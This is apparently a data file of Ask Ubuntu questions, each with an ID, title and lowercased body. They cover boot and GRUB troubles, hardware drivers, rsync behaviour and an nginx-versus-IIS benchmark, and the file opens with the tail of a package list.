libplasma-geolocation-interface4 libplasmaclock4abi3 libpoppler-glib8 libpoppler-qt4-3 libpoppler19 libpoppler28 libpostproc52 libpq5 libprocesscore4abi1 libproxy1 libproxy1-plugin-gsettings libproxy1-plugin-networkmanager libqt4-dbus libqt4-declarative libqt4-designer libqt4-help libqt4-network libqt4-opengl libqt4-qt3support libqt4-script libqt4-scripttools libqt4-sql libqt4-sql-mysql libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libruby1.8 libsolidcontrol4abi2 libssh-4 libswscale2 libtaskmanager4abi3 libtiff4 libtxc-dxtn-s2tc0 libudev0 libumfpack5.4.0 libunity-core-5.0-5 libweather-ion6 libwebkitgtk-1.0-0 libwebkitgtk-1.0-common libwebkitgtk-3.0-0 libwebkitgtk-3.0-common libxatracker1 libxcb-composite0 libxcb-dri2-0 libxcb-glx0 libxcb-randr0 libxcb-render0 libxcb-shape0 libxcb-shm0 libxcb-xv0 libxcb1 libxml2 libxml2-utils light-themes linux-generic-pae linux-headers-3.2.0-35 linux-headers-3.2.0-35-generic-pae linux-headers-generic-pae linux-image-3.2.0-35-generic-pae linux-image-generic-pae linux-libc-dev login lsb-base lsb-release make mountall multiarch-support mysql-client-core-5.5 mysql-common mysql-server-core-5.5 nautilus nautilus-data nvidia-settings onboard openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib oracle-java7-installer overlay-scrollbar parted passwd perl perl-base perl-modules phonon-backend-gstreamer plasma-dataengines-workspace plasma-widgets-workspace poppler-utils python-apport python-aptdaemon python-aptdaemon.gtk3widgets python-aptdaemon.pkcompat python-keyring python-libproxy python-libxml2 python-problem-report python-ubuntu-sso-client qdbus ruby1.8 scribus-trunk seahorse sessioninstaller software-center thunderbird thunderbird-globalmenu thunderbird-gnome-support thunderbird-locale-en thunderbird-locale-ta thunderbird-locale-ta-lk ubuntu-sso-client ubuntu-sso-client-gtk ubuntu-sso-client-qt ubuntu-tweak udev unattended-upgrades unity unity-common unity-greeter unity-lens-applications unity-services update-manager update-manager-core update-notifier update-notifier-common wpasupplicant x11-utils xserver-xorg-input-wacom xserver-xorg-video-ati xserver-xorg-video-nouveau xserver-xorg-video-radeon xterm xul-ext-ubufox
377099	smartcard reader vasco dp905 does not work anymore after upgrade to ubuntu 13.10	i have been using the vasco smartcard reader since quite some time . already in ubuntu 13.04 i was experiencing some problems ( i always had to plug it out and in again to make it work ) . now , i have upgraded to ubuntu 13.10 it does not work at all anymore . ( opensc-tool -a returns no smart card readers ) . when i plug it in , the green led is on for a few seconds and then it goes out again . the kernel still recognizes it . the output of lsusb is : bus 008 device 014 : id 1a44:0001 vasco data security international digipass 905 smartcard reader i have verified on an old ubuntu 10.04 the smart card reader is still working .
377103	how to find a program in ubuntu	in windos os i used to browse to c -- > program files to find the application needed to launch a file , i can not do this in ubuntu.whenever the launch application ask me to choose an appliction i wounder arround , i believe it is simple aliphabetical quistion of ubuntu but i really want to know it .
377111	can i load 12.04 into a completely formatted pc via a usb stick ?	when my son was given a pc that needed its original windows disc to boot again , i had an ubuntu 9.04 disc so we loaded that in instead , removing windows in the process . however , since this was an older version of ubuntu , there was a lot he could n't use or do , so i sent off for a 12.04 usb stick . we are trying to load this into his computer but ca n't get things running as they should - he has to have the old disc in to start the pc in the first place . is there a way we can remove everything and just turn on the pc with new usb inserted and things will load in fresh from there ?
377114	gsettings-qt bug ?	i have a problem using the gsettings-qt binding : https : //launchpad.net/gsettings-qt now i try to use it in my .qml import qtquick 2.1 import qtquick.controls 1.1 import gsettings 1.0 import qtquick.window 2.1 window { id : window gsettings { id : test schema.id : `` org.test.test '' //i created this schema but it does n't work with any onchanged : changes.push ( [ key , value ] ) ; } color : test.testcolor } whatever i do it says `` unable to assign [ undefined ] to qcolor , but if i try to set the value like from a button test.testcolor = mycolor the color gets properly set , but reading always returns undefined . anyone an idea ?
377116	how to see if wxpython is installed ?	i would like to know how can i determine if wxpython is installed on ubuntu 12.04 ? and i would like to know as well if ubuntu 12.04 already has wxpython installed by default ?
377119	is there any way to get ubuntu 13.10 to stop asking for my password	i 've always found this feature quite annoying and when i try to turn it off or simply just clear the password it still prompts me for a password . everytime i 've done that i 've had to reinstall ubuntu all over again because nothing i put in will work . it keeps asking for authentication on everything ! ! i ca n't even do a simple search of my own files and programs without being prompted for a password . i did a format and reinstall recently and i did n't have this problem until something popped up asking for my password for a keyring . i saw this a lot before i reinstalled but it would n't let me install some software i needed until i did . ever since , this stupid keyring thing is always asking for a password .
377124	is there a way to download all of my ubuntu one files ?	so , i have ubuntu one on my mac , and is synced with the ubuntu one website . i have folders within folders , within folders , and so on . if i needed to ( if , i got a new computer , for example ) , would it be possible to download everything from the website in a big compressed file ( zip , tar.gz , 7z , etc. ) ? if not , how would i go about downloading all of the files from the website to my hard drive ?
377127	grub uefi windows boot fail	i 've read about this , but still ca n't figure out my problem . i 've got a new laptop with windows 8 preinstalled . first thing i did was installing ubuntu , then grub , as i always did . now i can boot ubuntu , but not windows . while the machine starts i get this message : failed to open \efi\microsoft\boot\grubx64.efi - 80000000000000e failed to load grub failed to open \efi\boot\grubx64.efi - 80000000000000e failed to load grub checking media [ fail ] checking media [ fail ] then grub shows up with 4 options ubuntu advanced settings for ubuntu windows boot manager ( uefi on /dev/sda1 ) system setup selecting ubuntu goes fine , but selecting windows outputs this message : /endentire file path : /acpi ( a0 ... . ) /pci ... etc . error : can not load image . and it returns to grub menu . i 've read , that installing grub with uefi is n't a good idea . i always had bios . i can change the boot option to uefi secure mode off and legacy secure mode off . the second one says there are no boot images . how should i repair my bootloader so that i can choose between ubuntu and windows ?
377133	does `borderlessmaximizedwindows=false` still work with kubuntu 13.10 ?	since the upgrade to kubuntu 13.10 today i lost the borders around maximized windows . how can i re-enable them ? i tried this and of course changed true to false , but it does n't work .
377135	13.10 rt3290 wifi conncets to network once , then never again	wifi was working fantastic in 13.04 , then i installed 13.10 and it 's broken again . connections are intermittent . sometimes it connects sometimes it does n't . no stable connection .
377137	failure to boot after suspension	asus eee pc seashell 1215b dualboot win 8 and ubuntu 13.10 everything works fine after suspension . but when i reboot i do n't get to the grub screen . just a black screen with a blinking cursor in the top left corner . if i want to get it alive again i have to plug a usb with ubuntu in - restart from usb and shutdown . then grub opens the next time . what can i do to get rid of this problem ? sorry i ca n't explain it better .
377143	can i remove a category from the dash-home	when i type something in the dash-home the system searches the internet and displays choices from there . is it possible to remove this feature ? if it is , how ?
377144	trying to upload 13.10	trying to load ubuntu 13.10 only my laptop . downloaded and have the usb but laptop will not boot from usb . now have the icon for ubuntu 13.10-desktop-i386.iso showing but can not get it to load . try to run sudo apt-get install -f and get the message sudo not installed . try to load that and it runs up to 95 % and then stops . really getting frustrated with this whole thing . my laptop is running 10.04 but i dont think it 's a good install and wanted to upgrade . i even downloaded 13 from the source and it would not work .
377146	how do i apply a gtk+2 theme file ?	i 'm using ubuntu 13.10 . how do i install and apply : http : //gnome-look.org/content/show.php/teds+grey+tron+scheme ? content=150416
377147	amarok 2.8 not detecting ipod	i recently downloaded amarok and i would like to use it to manage the music on my ipod . however , when i plugged in my ipod it would n't let me change the default player to amarok ( i selected amarok and pressed ok and it stayed as shotwell/vlc ) . then , i tried to follow some guides online about how to make amarok detect my ipod but they all seem to be outdated and relevant to older versions of amarok . i 'm unsure of how to make this work , does anyone how to make the new version of amarok work with my ipod ? i 'm using iphone 5 and ubuntu 13.10 with amarok 2.8 . if this is n't the right place to ask i would really appreciate a redirect to what is the right place to ask .
377148	xfce battery indicator	i 'm searching for a battery indicator applet for xfce4 , does anyone know one ? i already tried xfce4-battery-plugin but the battery icon is horrible . i was looking for something like the gnome2 battery indicator : is there anything like that for xfce ?
377155	dual boot ubuntu 12.04 and windows 7 problem	i have spent the past 4 days trying to get ubuntu and windows 7 on my computer and every time it boots straight into ubuntu . i have looked through most of the threads and tried windows first , ubuntu first , partitioning the drive , reinstall grub with boot - repair , pretty much every tutorial i can find , i only have one usb drive to boot off of , so this is very time consuming . i have to download the iso file and create a bootable usb everytime i install an os and it 's all for nothing because there is no boot menu . if anyone can help it would be greatly appreciated
377157	saving gmail attachments using drag and drop results in a link , not a file	when i open a message in gmail and attempt to save an attachment using the drag and drop method , ( click on the file icon and drag it to a folder or the desktop ) the resulting file in the destination folder is a `` link '' , not the actual attachment . this happens in both firefox and chrome browsers . i have tried starting chrome with labs disabled ( https : //mail.google.com/mail/ ? labs=0 ) with no results . os : ubuntu 12.04 chrome : version 30.0.1599.114 firefox : version 25.0 i 'm guessing this problem is unique to my system as googling provides no other hits on the topic . using the `` download '' link in gmail does work fine . any ideas on how to troubleshoot ? any and all help greatly appreciated . this is slowly driving me nuts . ; - )
377162	can `` libexcel-writer-xlsx-perl '' be added to precise and later ?	i am interested in using the perl module excel : :writer : :xlsx on precise . i can install it using cpan , but due to complications at my office , it 'd be easier to just be able to do apt-get install from the official ubuntu repositories . what are the chances of having the perl module excel : :writer : :xlsx ( libexcel-writer-xlsx-perl ) added to precise or later ?
377171	how can i boot ubuntu from a usb external disk that was previously the internal laptop disk ?	i finally decided to install ubuntu 12.04 lts on my laptop ; i also upgraded the internal disk to 1tb and kept ( untouched ) the old 500 gb disk in a sata-usb enclosure for sake of security ( you may never know ... ) . now , i need to boot again the old disk from the usb . when i choose to boot from the usb disk , ubuntu 10.04 splash screen is displayed ; after few seconds i get the following error message : alert ! /dev/disk/by-uuid/affc8cb ... ... does not exist . dropping to a shell ! busybox v.1.13.3 ( ubuntu 1:1.13.3-1ubuntu11 ) built-in shell ( ash ) enter 'help ' for a list of built-it commands . ( initramfs ) i 'm not very skilled with this stuff . how do i get ubuntu 10.04 to start from the usb disk ? thank you . dave
377172	server 10.04.4 ca n't load cd-room media+stuck blue screen installing with usb stick	my cpu is a optiplex 210l . i need to install ubuntu 10.04.4 lts ( lucid lynx ) on a cpu . it had centos before changing it to ubuntu 12.04 i have tried to install using a usb stick ( unetbootin ) but it gives me problem after the keyboard layout config a message with ca n't load cd-room media appeared and i tried to load it manually but it seems it ca n't find it . i tried with the install option in the booting menu and i reached a little bit further . till the archive mirror and after that a windows pop out , disappears and blue screen is all what is shown . i tried with a cd but the cpu ca n't read it though my laptop can . i read some stuff about the bios settings but i 'm amateur and kind of afraid of touching it . any other ideas ?
377173	how to add fonts on libre office writer ?	how can i download cursive , etc onto libre office writer ? ? i have already tried multiple websites , but none of the methods worked .
377174	rsync-ing highly compressible files - am i missing something here ?	today i was using rsync over a slow internet connection to transfer a video file - uncompressed avi , 60 seconds duration , 360mb in size . basically it contained 1500 frames of the same image , hence it was highly compressible . top upload speed on my internet connection is 130kb/s . i ran rsync like this : rsync -avhz -- progress -- partial myfile.avi remote : /path/ the transfer speed varied from 400kb/s to 1,5mb/s . i accidentially ctrl+c 'd the running rsync after the file was about halfway transferred . but no worries , i used -- partial switch , so i just restarted rsync with the same parameters as before . only that now the transfer speed was 80mb/s ! i tried this again , and again and again . even without the -z switch , the result was the same . on the first run , the transfer speed was a shy 1,5mb/s , but after interrupting rsync after a while and restarting it , the rest of the file was transferred almost instantaneously . the md5sum matched on both ends . my question is : can anyone explain this behaviour to me ? am i missing something obvious here ? i would expect that file would be transferred much faster already with -z switch on the first go , but i would n't expect it to speed up so drastically without even using -z after resuming the transfer .
377175	which radeon driver do i get ?	i have updated my ubuntu kernel to 3.12 so i can take advantage of updated dpm . i am trying to find firmware for my radeon from this website http : //people.freedesktop.org/~agd5f/radeon_ucode/ i did a lspci | grep vga and i get this 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880m [ mobility radeon hd 4225/4250 ] which firmware do i use so that i can add it to /lib/radeon
377179	microphone does not work on skype	i have a macbook pro mid 2012 model ( 9,1 ) i recently installed ubuntu 13.10 and fairly new to linux . everything works but the microphone i tried to do a test call on skype and it doesnt work . i am attaching a screenshot on what i ab able to see in the drop down list when i go to micrphone settings . screen shot of my skype mic settings - tried a few of them but didnt work , just giving a heads up . https : //dl-web.dropbox.com/get/other_docs/screenshot % 20from % 202013-11-14 % 2022 % 3a57 % 3a05.png ? w=aactoxh0m33o2u7ifrb70khjf0psymqdtyq-wr-wrreuow
377187	my laptop will not boot any distro other than ubuntu from usb	i am having issues trying to create a persistent live usb flash drive . i can not seem to get any kind of persistence working . my first try was to create a ( l/k ) ubuntu 13.04 live usb with persistence using universal usb installer ( pendrive linux ) . these distros boot up from usb , but persistence just does not seem to work . i then tried unetbootin and linux live usb creator but the same problem arises . my next try was to create a bootable usb drive with knoppix or puppy , because it has built in persistence . the problem here is that my laptop wo n't even boot from the usb drive . i have tried universal usb installer , unetbootin and lili usb but none works . the last thing i tried was to burn puppy to a cd and booted from that , which worked . i then tried the universal installer and set everything up to install puppy on a flash drive ( with fat32 and ext2 ) but again , the laptop refuses to boot from it . i even tried multiple bootloaders but the first three did n't work so i gave up . can anyone tell me what is going on here ? somehow the bootloader provided with ubuntu works on usb drives but when using a different distro my laptop does not see the usb drive as bootable . would it be possible to create a bootable usb drive with ubuntu , so that it will boot , but then remove the ubuntu image and swap it with puppy ? if so , how can it be done ? edit : oh and i am using windows 8 x64 on uefi.. uefi has been nothing but trouble when using any kind of unix system so that 's probably the one to blame . still , windows wo n't boot in legacy mode so i 'm stuck with it .
377189	server 12.04 install monitor issue	i 've decided to convert an old tower pc with 2ghz intel core duo and 2gb ram into a server using ubuntu 12.04 . i 'm far from an expert and completely new to the server side of things ... previously the whole system worked fine but i 've been having issues with the feed to my monitor . i 've tried a couple of reinstalls , a couple of resets and even put in a new 2tb hdd last night and did a fresh install onto the new second hdd . the install went well . on the final reboot stage when i remove the cd and press 'continue ' the system shuts down prior to the reboot , then sounds like it 's rebooting ( system beeps etc . ) but my monitor feed goes black - no feedback , no cpu/system splach screen ... nothing . the monitor shows the 'no signal ' message but the vga cable is connected and tested on my laptop and works fine . it did this a couple of days ago so i did a reset with the button on the case and then after a couple of goes it worked fine ... last night i shutdown to install the new hdd and it would n't boot again . i did a fresh install , which went okay , then on reboot ... you 've guessed it . nada . nothing . zilch . zip . any clues ? i 'd like to stay with 12.04 as this is the system i use on my laptop and the lts side of things appeals . any help would be greatly appreciated . iain .
377199	13.10 - ca n't copy iso file to pen drive	i want to copy 4.4 gb iso file to 8 gb pen drive , but after coping 4.3 gb , it shows file too large , even though there is enough free space in the pen drive . so i had to copy it to external hard disk . how can i just copy iso file to the pen drive ? i even tried to rename the file to exe or rar , but no hope .
377201	what should i do if my computer ca n't run ubuntu	i downloaded both 12.04lts and 13.04 and installed it on my computer , an acer aspire 3005wlci , but when the computer starts up it fails to boot . what should i do for it . any suggestion is a good one . thanks in advance
377204	open current directory as project in sublime ?	so i finally have sublime all working through terminal the way i like it , but i 'd like to be able to mkdir , cd into the directory ( just creating a top-level website file tree ) , and open sublime through the terminal , and have the entire directory opened up as a `` project '' where i can see the file structure in the left pane . i 've had this working on mac and windows menu , but for the life of me i ca n't figure it out on my linux box . running sublime 2.0.2 , raring ( 13.04 ) , and gnome 3.6.3.1 any ideas ?
377205	how to find out what graphics driver is installed ?	i installed xubuntu 13.04 two months ago . but i do n't know to find out which driver is installed for my gpu ( i mean graphic card driver ) or is it installed ? i 'm feeling something is wrong with my pc graphics .
377207	rotating one screen with xinerama enabled	does anyone know a way to do this , assuming there 's a workaround to the age old bug ?
377212	get information about a url in terminal	there 's this useful command that gets information about a server when you pass it a url that 's pointed at the server in question . i ca n't remember it though , or find it . it gets the os of the server , the webserver installed on it and more useful information . i think it might be curl , but what options should i pass it ? is there an app i can apt-get that will provide even more information about a url that is n't offered by this native application i ca n't find ? i 'm trying to scan a server for ports and that sort of thing . just want a breif overview . it was n't nmap . it instantly returned webserver : os : information like that .
377213	why so many virtual consoles ?	what is the reason for having so many virtual consoles ? i would understand if there was one in case the gui crashes but 6 more besides the default ? what are they for ? i even see no usage for any of them except when the gui freezes .
377216	i ca n't get ubuntu server 12.04/nginx to outperform windows 2008 server/iis 7.5	i am determined to get nginx on ubuntu server 12.04 lts to outperform iis 7.5 on windows 2008 server . for comparison , i am using a apache bench and a simple ( 231 byte ) html file . the ubuntu server and the windows server are both running on virtualbox on the same physical hardware and have identical vm hardware specs with 2 processors and 4gb memory . i 've done zero performance tuning on the windows machine , the ubuntu machine has the following settings . my nginx.conf looks like this : user www-data ; worker_processes 4 ; worker_rlimit_nofile 999999 ; pid /run/nginx.pid ; events { worker_connections 20000 ; multi_accept on ; use epoll ; } http { if_modified_since before ; open_file_cache max=1000000 inactive=60s ; open_file_cache_valid 30s ; open_file_cache_min_uses 2 ; open_file_cache_errors on ; sendfile on ; tcp_nopush on ; tcp_nodelay on ; keepalive_timeout 65 ; keepalive_requests 1000000 ; types_hash_max_size 4096 ; server_tokens off ; send_timeout 2 ; reset_timedout_connection on ; client_body_timeout 10 ; include /etc/nginx/mime.types ; default_type application/octet-stream ; access_log off ; error_log /var/log/nginx/error.log crit ; gzip on ; gzip_min_length 10240 ; gzip_proxied expired no-cache no-store private auth ; gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript ; gzip_disable `` msie [ 1-6 ] \ . `` ; client_max_body_size 10m ; include /etc/nginx/upstreams ; include /etc/nginx/conf.d/*.conf ; include /etc/nginx/sites-enabled/* ; } server { listen 80 ; server_name nginxbench ; root /var/www/nginxbench ; location / { expires max ; } } my /etc/sysctl.conf looks like this ( and did n't show any improvement over the defaults ) : net.ipv4.ip_forward=1 net.ipv4.conf.all.send_redirects = 0 kernel.sem = 250 32000 100 128 kernel.shmall = 2097152 kernel.shmmax = 2147483648 kernel.shmmni = 4096 fs.file-max = 999999 vm.swappiness = 0 vm.vfs_cache_pressure = 50 vm.min_free_kbytes = 65536 net.core.rmem_default = 65536 net.core.rmem_max = 33554432 net.core.wmem_default = 65536 net.core.wmem_max = 33554432 net.core.somaxconn = 32768 net.core.netdev_max_backlog = 32768 net.ipv4.tcp_rmem = 10240 87380 33554432 net.ipv4.tcp_wmem = 10240 87380 33554432 net.ipv4.tcp_no_metrics_save = 1 net.ipv4.tcp_window_scaling = 1 net.ipv4.tcp_sack = 1 net.ipv4.ip_local_port_range = 1024 65535 net.ipv4.tcp_max_tw_buckets = 360000 net.ipv4.tcp_max_orphans = 3276800 net.ipv4.tcp_tw_reuse = 1 net.ipv4.tcp_tw_recycle = 1 net.ipv4.tcp_syn_retries = 2 net.ipv4.tcp_synack_retries = 2 net.ipv4.tcp_max_syn_backlog = 10240 net.ipv4.tcp_mem = 94500000 915000000 927000000 net.ipv4.tcp_timestamps = 1 net.ipv4.tcp_fin_timeout = 15 net.ipv4.tcp_orphan_retries = 2 net.ipv4.conf.all.accept_redirects = 0 net.ipv4.conf.default.accept_redirects = 0 net.ipv4.conf.all.secure_redirects = 0 net.ipv4.conf.default.secure_redirects = 0 net.ipv4.conf.all.log_martians = 1 net.ipv4.conf.default.log_martians = 1 net.ipv4.conf.all.accept_source_route = 0 net.ipv4.conf.default.accept_source_route = 0 net.ipv4.conf.all.rp_filter = 1 net.ipv4.conf.default.rp_filter = 1 net.ipv4.tcp_syncookies = 1 net.ipv4.netfilter.ip_conntrack_max = 300000 ... and , my /etc/security/limits.conf looks like this : @ www-data soft nofile 999999 @ www-data hard nofile 999999 below are the results i get for the corresponding apache bench commands . for 100 concurrent requests : ubuntu 12.04/nginx : ab -kc 100 -n 10000 http : //nginxbench/index.html this is apachebench , version 2.3 < $ revision : 655654 $ > copyright 1996 adam twiss , zeus technology ltd , http : //www.zeustech.net/ licensed to the apache software foundation , http : //www.apache.org/ benchmarking nginxbench ( be patient ) completed 1000 requests completed 2000 requests completed 3000 requests completed 4000 requests completed 5000 requests completed 6000 requests completed 7000 requests completed 8000 requests completed 9000 requests completed 10000 requests finished 10000 requests server software : nginx server hostname : nginxbench server port : 80 document path : /index.html document length : 231 bytes concurrency level : 100 time taken for tests : 1.363 seconds complete requests : 10000 failed requests : 0 write errors : 0 keep-alive requests : 10000 total transferred : 5320000 bytes html transferred : 2310000 bytes requests per second : 7336.44 [ # /sec ] ( mean ) time per request : 13.631 [ ms ] ( mean ) time per request : 0.136 [ ms ] ( mean , across all concurrent requests ) transfer rate : 3811.51 [ kbytes/sec ] received connection times ( ms ) min mean [ +/-sd ] median max connect : 0 0 1.2 0 14 processing : 0 13 7.6 13 29 waiting : 0 13 7.6 13 29 total : 0 14 7.7 14 39 percentage of the requests served within a certain time ( ms ) 50 % 14 66 % 18 75 % 20 80 % 21 90 % 24 95 % 26 98 % 27 99 % 27 100 % 39 ( longest request ) win2k8/iis : ab -kc 100 -n 10000 http : //iisbench/index.html this is apachebench , version 2.3 < $ revision : 655654 $ > copyright 1996 adam twiss , zeus technology ltd , http : //www.zeustech.net/ licensed to the apache software foundation , http : //www.apache.org/ benchmarking iisbench ( be patient ) completed 1000 requests completed 2000 requests completed 3000 requests completed 4000 requests completed 5000 requests completed 6000 requests completed 7000 requests completed 8000 requests completed 9000 requests completed 10000 requests finished 10000 requests server software : microsoft-iis/7.5 server hostname : iisbench server port : 80 document path : /index.html document length : 231 bytes concurrency level : 100 time taken for tests : 1.143 seconds complete requests : 10000 failed requests : 0 write errors : 0 keep-alive requests : 10000 total transferred : 5010000 bytes html transferred : 2310000 bytes requests per second : 8747.07 [ # /sec ] ( mean ) time per request : 11.432 [ ms ] ( mean ) time per request : 0.114 [ ms ] ( mean , across all concurrent requests ) transfer rate : 4279.57 [ kbytes/sec ] received connection times ( ms ) min mean [ +/-sd ] median max connect : 0 0 1.2 0 14 processing : 1 11 3.1 11 43 waiting : 1 11 3.1 11 43 total : 1 11 3.3 11 43 percentage of the requests served within a certain time ( ms ) 50 % 11 66 % 11 75 % 11 80 % 12 90 % 14 95 % 20 98 % 22 99 % 23 100 % 43 ( longest request ) for 500 concurrent requests : ubuntu 12.04/nginx : ab -kc 500 -n 10000 http : //nginxbench/index.html this is apachebench , version 2.3 < $ revision : 655654 $ > copyright 1996 adam twiss , zeus technology ltd , http : //www.zeustech.net/ licensed to the apache software foundation , http : //www.apache.org/ benchmarking nginxbench ( be patient ) completed 1000 requests completed 2000 requests completed 3000 requests completed 4000 requests completed 5000 requests completed 6000 requests completed 7000 requests completed 8000 requests completed 9000 requests completed 10000 requests finished 10000 requests server software : nginx server hostname : nginxbench server port : 80 document path : /index.html document length : 231 bytes concurrency level : 500 time taken for tests : 1.961 seconds complete requests : 10000 failed requests : 0 write errors : 0 keep-alive requests : 10000 total transferred : 5320000 bytes html transferred : 2310000 bytes requests per second : 5099.30 [ # /sec ] ( mean ) time per request : 98.053 [ ms ] ( mean ) time per request : 0.196 [ ms ] ( mean , across all concurrent requests ) transfer rate : 2649.25 [ kbytes/sec ] received connection times ( ms ) min mean [ +/-sd ] median max connect : 0 3 12.5 0 64 processing : 0 92 51.2 94 195 waiting : 0 92 51.2 94 195 total : 0 95 52.2 97 224 percentage of the requests served within a certain time ( ms ) 50 % 97 66 % 120 75 % 137 80 % 146 90 % 167 95 % 177 98 % 186 99 % 193 100 % 224 ( longest request ) win2k8/iis : ab -kc 500 -n 10000 http : //iisbench/index.html this is apachebench , version 2.3 < $ revision : 655654 $ > copyright 1996 adam twiss , zeus technology ltd , http : //www.zeustech.net/ licensed to the apache software foundation , http : //www.apache.org/ benchmarking iisbench ( be patient ) completed 1000 requests completed 2000 requests completed 3000 requests completed 4000 requests completed 5000 requests completed 6000 requests completed 7000 requests completed 8000 requests completed 9000 requests completed 10000 requests finished 10000 requests server software : microsoft-iis/7.5 server hostname : iisbench server port : 80 document path : /index.html document length : 231 bytes concurrency level : 500 time taken for tests : 1.604 seconds complete requests : 10000 failed requests : 0 write errors : 0 keep-alive requests : 10000 total transferred : 5010000 bytes html transferred : 2310000 bytes requests per second : 6234.29 [ # /sec ] ( mean ) time per request : 80.202 [ ms ] ( mean ) time per request : 0.160 [ ms ] ( mean , across all concurrent requests ) transfer rate : 3050.17 [ kbytes/sec ] received connection times ( ms ) min mean [ +/-sd ] median max connect : 0 3 14.9 0 70 processing : 6 75 13.0 76 162 waiting : 6 75 13.0 75 162 total : 6 78 19.0 76 208 percentage of the requests served within a certain time ( ms ) 50 % 76 66 % 78 75 % 79 80 % 80 90 % 83 95 % 137 98 % 138 99 % 140 100 % 208 ( longest request ) for 1000 concurrent requests : ubuntu 12.04/nginx : ab -kc 1000 -n 10000 http : //nginxbench/index.html this is apachebench , version 2.3 < $ revision : 655654 $ > copyright 1996 adam twiss , zeus technology ltd , http : //www.zeustech.net/ licensed to the apache software foundation , http : //www.apache.org/ benchmarking nginxbench ( be patient ) completed 1000 requests completed 2000 requests completed 3000 requests completed 4000 requests completed 5000 requests completed 6000 requests completed 7000 requests completed 8000 requests completed 9000 requests completed 10000 requests finished 10000 requests server software : nginx server hostname : nginxbench server port : 80 document path : /index.html document length : 231 bytes concurrency level : 1000 time taken for tests : 1.693 seconds complete requests : 10000 failed requests : 0 write errors : 0 keep-alive requests : 10000 total transferred : 5320000 bytes html transferred : 2310000 bytes requests per second : 5905.01 [ # /sec ] ( mean ) time per request : 169.348 [ ms ] ( mean ) time per request : 0.169 [ ms ] ( mean , across all concurrent requests ) transfer rate : 3067.84 [ kbytes/sec ] received connection times ( ms ) min mean [ +/-sd ] median max connect : 0 23 118.8 0 1011 processing : 0 134 108.5 108 480 waiting : 0 134 108.5 107 480 total : 0 157 150.5 135 1060 percentage of the requests served within a certain time ( ms ) 50 % 135 66 % 180 75 % 229 80 % 238 90 % 329 95 % 387 98 % 460 99 % 1029 100 % 1060 ( longest request ) win2k8/iis : ab -kc 1000 -n 10000 http : //iisbench/index.html this is apachebench , version 2.3 < $ revision : 655654 $ > copyright 1996 adam twiss , zeus technology ltd , http : //www.zeustech.net/ licensed to the apache software foundation , http : //www.apache.org/ benchmarking iisbench ( be patient ) completed 1000 requests completed 2000 requests completed 3000 requests completed 4000 requests completed 5000 requests completed 6000 requests completed 7000 requests completed 8000 requests completed 9000 requests completed 10000 requests finished 10000 requests server software : microsoft-iis/7.5 server hostname : iisbench server port : 80 document path : /index.html document length : 231 bytes concurrency level : 1000 time taken for tests : 1.523 seconds complete requests : 10000 failed requests : 0 write errors : 0 keep-alive requests : 10000 total transferred : 5010000 bytes html transferred : 2310000 bytes requests per second : 6566.76 [ # /sec ] ( mean ) time per request : 152.282 [ ms ] ( mean ) time per request : 0.152 [ ms ] ( mean , across all concurrent requests ) transfer rate : 3212.84 [ kbytes/sec ] received connection times ( ms ) min mean [ +/-sd ] median max connect : 0 12 37.4 0 127 processing : 9 133 27.6 137 293 waiting : 9 133 27.6 137 293 total : 9 146 48.9 138 390 percentage of the requests served within a certain time ( ms ) 50 % 138 66 % 142 75 % 143 80 % 147 90 % 250 95 % 255 98 % 258 99 % 285 100 % 390 ( longest request ) the results are consistently better on windows/iis , but i 'm not ready to accept defeat ! so , my question is , what setting ( s ) am i missing on the ubuntu machine that would boost the performance enough to consistently outperform the windows machine ?
377218	is there a program to mine bitcoins in ubuntu 13.10 ?	i do not understand much about mine bitcoins , but i downloaded a program that is like a wallet , but i want to know how i do to mine . has a calling guiminder but is for windows , someone knows one that is for ubuntu ?
377225	get root access to an ubuntu server	hacking does n't really interest me ( you 're not allowed to brag about what you 've achieved ! ) but i still do n't want to neglect server security . is there a good book , tutorial or document on hacking an ubuntu server ( freshly installed ) to pieces ? i 've done security 101 . disabled root user login via ssh , only have one super user , that sort of thing , but i still feel like i do n't know enough . i have n't done anything to my ports , for example , and i feel like i should know more about ports . i think i know what they do , i know they are simply places that allow data to enter and leave a system , but i still feel like i do n't know enough . and if the ports are the only place that data can enter and leave , are closing and filtering ports the only aspect i have to worry about ? in conclusion , how would someone attempt to get root access to an ubuntu server ( newly installed ) they do n't have access to ? they 'd use an application like nmap to scan for open ports , but where would they go from there ? is brute force the only way to get a password used for ssh ? how can i set ubuntu to be strict about this , stopping all logins for five minutes after one wrong password ? none of the directories i 've created on the system are permissioned to be executable , but why does this matter ? if someone can place an executable file in one of these directories they 've already got root access and is n't it game over ? sorry if this is too open ended . the emboldened text refines my question i hope .
377227	how to stop bluefish from displaying `` file contains very long lines . split these lines ? '' message	this message is displayed when opening a file that contain not-too-long lines . off course it displays when the file contains very long lines . but i want to stop this pop up message from showing up . i know it may affect the performance , but it just an extra click i wan na get rid of .
377228	ubuntu on a home built computer cant find live file medium	ive been trying to get ubuntu to work on my pc but everytime i hit try without installing or install it always ends up at a busybox screen and says `` unable to find a medium with a live file system . '' ive tried every work around i can find and every fix i can find but no matter what it always comes up as that . my pc is as such : windows 8.1 amd a6-3650 overclocked to 4.1ghz asus f1a55-m le motherboard evga gtx650 ti graphics card 8gbs ram western digital green 500gb hard drive i did a 1gb partition to the hard drive and tried to install it on the partition and got nothing . ive been using a thumbdrive with a `` bootable '' ubuntu 12.04 . is anybody albe to help ?
377229	how do i install ubuntu on a ssd with hdd for data ?	i have bought a new computer with a 128gb ssd and a 750gb hdd , and i 'd like to install ubuntu 13.10 o.s. , hardware drivers and programs that i will use more often on the ssd and data on the hdd disk ( film , video , photo.. etc .. ) . it makes sense ? how is it possible for me to do this ?
377233	how to install google dart in ubuntu ?	how can i install google dart in my ubuntu 13.10 ? is it pre-installed with ubuntu or have to install manually ? thank you .
377238	how to add new network card to maas distro	i am using ubuntu 12.04lts with maas . new computers i have bought have intel i210/211 series network cards . support for this card is not included in the 12.04lts distro . i also have some mellanox infiniband cards coming that will also need their drivers adding to 12.04lts . i have the linux drivers for both cards . how do i add new drivers into the install and commissioning boot images so i can provision the new computers from my existing maas server ? ?
377239	why there is a long list waiting for internet : what does http do ?	my internet connection has become so much slow . i am using chromium browser . in addition to it , dropbox and ubuntu one is connected . but there is a long list in nethogs . why is that ? what does http doing here ?
